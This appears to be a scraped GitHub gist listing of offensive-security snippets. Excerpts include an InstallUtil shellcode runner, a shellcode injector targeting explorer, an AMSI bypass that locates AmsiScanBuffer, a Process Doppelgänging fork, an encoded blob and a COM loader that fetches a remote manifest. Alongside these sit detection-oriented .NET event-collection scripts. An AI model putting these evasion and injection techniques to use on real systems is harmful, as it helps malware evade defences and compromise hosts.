TheWover
/ rwxHunter.cs
Created
November 2, 2018 20:50
— forked from nicholasmckinney/rwxHunter.cs
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
TheWover
/ ShellcodeTest.cs
Created
January 16, 2019 16:01
Dirty but working C# remote shell code injector. Injects into explorer using the architecture of the platform. Modified from several random sources and cleaned up a bit.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Author: TheWover | |
| Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
| Last Modified: 11/1/2018 | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace ShellcodeTest |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // TestLoad.cpp : This file contains the 'main' function. Program execution begins and ends there. | |
| // | |
| #include "pch.h" | |
| #include <iostream> | |
| #include <windows.h> | |
| typedef bool(*testFunction)(); |
TheWover
/ CollectDotNetEvents.ps1
Created
January 24, 2019 01:35
— forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
| # Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
| # logman stop dotNetTrace -ets | |
| # This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
| # I got the process ID by running a procmon trace | |
| $TargetProcessId = 8256 |
TheWover
/ CollectDotNetEvents.ps1
Created
January 24, 2019 01:35
— forked from cobbr/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Start-DotNetEventCollection | |
| { | |
| Param( | |
| [Parameter(Position = 0)] | |
| [Alias('PSPath')] | |
| [String] $TracePath = './dotNetTrace.etl', | |
| [Parameter(Position = 1)] | |
| [String] $TraceName = 'dotNetTrace' | |
| ) |
TheWover
/ AMSIBypass2.cs
Last active
February 1, 2019 18:51
Copy of AMSIBypass2 from cyberark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static string run() | |
| { | |
| IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll | |
| if (dllHandle == null) return "error"; | |
| //Get the AmsiScanBuffer function address | |
| IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer"); | |
| if (AmsiScanbufferAddr == null) return "error"; | |
TheWover
/ inject.c
Last active
February 1, 2019 18:51
— forked from hfiref0x/inject.c
Process Doppelgänging
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // TheWover: Forked this. Note to self, make it do this: https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/ | |
| // | |
| // Ref = src | |
| // https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
| // | |
| // Credits: | |
| // Vyacheslav Rusakov @swwwolf | |
| // Tom Bonner @thomas_bonner | |
| // |
TheWover
/ WinAPIDocs.txt
Last active
February 2, 2019 17:04
Resources for documentation on various Windows APIs. Especially the ones undocumented by Microsoft.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Win32 & Kernel: | |
| https://www.vergiliusproject.com/ | |
| http://undocumented.ntinternals.net/ | |
| https://www.geoffchappell.com/index.htm | |
| Structs: | |
| http://terminus.rewolf.pl/terminus/ | |
| .NET: | |
| https://referencesource.microsoft.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 7VlrbBzXdT53dmZ2+VqJS4nUg5RXz1CktF6KkijZkiOSu5Lo8iFpSTm0pVLD3RE50XJnNTMrae0qphI7jtDYjRLAiIMmhdO4iNu4Tds4cYu4jhvAgYoYqVv/cABXtX+0RWsEqYsacRLD7nfuDHeXFFurRf+0yCXn3HPPOffc87iv2Rm593MUIiIVzwcfED1HfjlEH17m8URv+/Mofavu5Y3PieGXN47PWm686NgzjjEXzxqFgu3Fp824UyrErUI8NZaJz9k5M9HUVL8l0HEsTTQsQvR9/ZevLuh9gzbFG0SSaB0auk+7ex9AvGLYSokrvt1UFfONUnw0RGceZlH+r9aVSpZ3+ojGAoefCy3j5BmiRrYTcvtuISaVAvsiNc0I2kdr2gnPvOSx3jWBX+uqdteoOJNwXCdLgW2wUTrcvlgO5EMJx8zbWd9Wtlnqit8kN7DUzO2BU0dlF41eR2K8GJG4FR+XKX9FnQhv/SfQX31fb0Bi3Ga0O6Gy3tsEvZ0twGDZCqLOVYx20fpkSJqMPs3UfZLIXQ1GPemK3QqkwQGjGH7M+uxW7t/GncKNN3r1HWHdXsOt15vI6YaMUmev5cHWySE+g5E61zNKN4jaWtTupyJdop39bKB4N4AsKu3aS5sgK1qSCm3zQ9dMoXrdMaCzEx3qdyrddUon6HpDd13ro10QbuimMOr1SZUeJZ5r6EOK3QFpewOb332fbt/G5lPYRiLqQ1JTY2THADnnoDgUeGJvRNWEGtGpf1XqblHrmtXWZvUxy94M4rZmtUW70V23I1wX+Eu6vYXN+vKNhpoo+Ia1aN3UrHVxPKWvB2jzlO+rQlGaKfk4233Gn05BzLey0YrzJExzt7Hd4VAnvNIb9UhrBJZ8hMfQW91ONvfG9haVnGch26z6MW9bNuZa91N1XWKlH+eePbTZj7NGD4Ki8did23lc3e6SQzo/5TTa3RzFHTI8zs84VguNsKCi6mwG7ITleufOGsF+UNs+ezsG8CmqM7Ig16h3JkDyHYFE |
TheWover
/ regfreeCom.ps1
Created
February 19, 2019 19:34
— forked from nicholasmckinney/regfreeCom.ps1
Registration-Free Com Object from URL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Make Sure dynwrapx,dll is in %temp% | |
| $a = new-object -com Microsoft.Windows.ActCtx | |
| $a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest' | |
| $b = $a.CreateObject("DynamicWrapperX") | |
| $b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null | |
| $b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null | |
OlderNewer